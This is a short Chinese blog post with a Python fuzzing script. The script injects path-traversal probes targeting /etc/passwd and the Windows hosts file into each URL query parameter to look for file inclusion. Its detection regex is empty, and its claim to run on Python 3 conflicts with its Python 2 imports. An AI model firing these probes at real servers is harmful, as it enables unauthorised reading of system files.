利用Python开发Fuzz漏洞插件

Python 2016-09-30

#-*- coding:utf-8 -*-
#code by Mosuan
#2016.09.30
import urlparse
import urllib
import sys

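def GetUrl(url, payload):
    """Print and return one fuzz URL per query parameter per payload entry.

    For every entry in ``payload`` and every ``key=value`` pair in the query
    string of ``url``, exactly one pair has its value replaced by
    ``entry['payload']`` while every other pair keeps its original value.
    Each resulting URL is printed (the place where a detector would be
    plugged in) and also collected into the returned list.

    Args:
        url: Target URL. Scheme, host and path are kept; the fragment and
            any ``;params`` segment are dropped.
        payload: Iterable of dicts, each with at least a ``'payload'`` key
            holding the string to inject.

    Returns:
        list of generated URL strings, in query-string order. Empty list when
        ``url`` carries no query string (a message is printed in that case).

    Security-relevant caveats:
        * The encoded query is deliberately ``unquote``-d so that payload
          characters such as ``/`` and backslash reach the target verbatim.
          The same step also un-escapes ``&``, ``=``, ``#`` and ``%`` inside
          a payload, which would re-split or truncate the query -- keep such
          characters out of payload strings, or encode them yourself.
        * Duplicate parameter names (``a=1&a=2``) are preserved and each
          occurrence is fuzzed separately instead of being collapsed into a
          dict, which would silently drop all but the last value.
    """
    # Function-local import keeps this block runnable on Python 2 and 3.
    try:
        from urllib.parse import urlparse, parse_qsl, urlencode, unquote
    except ImportError:  # Python 2
        from urlparse import urlparse, parse_qsl
        from urllib import urlencode, unquote

    parts = urlparse(url)
    if parts.query == '':
        print(u'没有参数跑个卵蛋')
        return []

    # Base URL without its query; the '?' is re-appended here.
    base = "%s://%s%s?" % (parts.scheme, parts.netloc, parts.path)
    # A list of (key, value) keeps order and duplicates; keep_blank_values=True
    # so that ``a=`` is still a fuzzable slot.
    pairs = parse_qsl(parts.query, keep_blank_values=True)

    urls = []
    for entry in payload:
        injected = entry['payload']
        for idx, (key, _original) in enumerate(pairs):
            # Fresh copy per iteration so each URL carries exactly one payload.
            mutated = list(pairs)
            mutated[idx] = (key, injected)
            fuzz_url = base + unquote(urlencode(mutated))
            # Detection hook: decide here whether the target is vulnerable.
            print(fuzz_url)
            urls.append(fuzz_url)
    return urls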

# Layout of each payload entry:
#   type    -- what the regex is matched against; e.g. "header" means the
#              response headers are inspected to decide if the bug exists
#   payload -- the string injected into a query parameter
#   content -- text reported when the bug is found (e.g. "file inclusion")
#   reg     -- regex used to decide whether the bug exists
#              NOTE: an empty pattern matches anything; fill it in before
#              relying on it for detection.
payload = [
    {
        "type": "content",
        "payload": probe,
        "content": u"文件包含",
        "reg": r"",
    }
    for probe in (
        "../../../../../../../etc/passwd",
        "C:\\Windows\\System32\\drivers\\etc\\hosts",
    )
]

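if __name__ == "__main__":
    # Equality, not ``in``: ``__name__ in "__main__"`` is a substring test
    # and would also fire for any name that happens to be a substring of
    # "__main__".
    if len(sys.argv) >= 2:
        url = sys.argv[1]
        GetUrl(url, payload)
    else:
        # Fail loudly instead of silently doing nothing when no URL is given.
        sys.stderr.write("usage: %s <url-with-query-string>\n" % sys.argv[0])
        sys.exit(2)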

效果图:
xxx.png


本文由 Mosuan 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

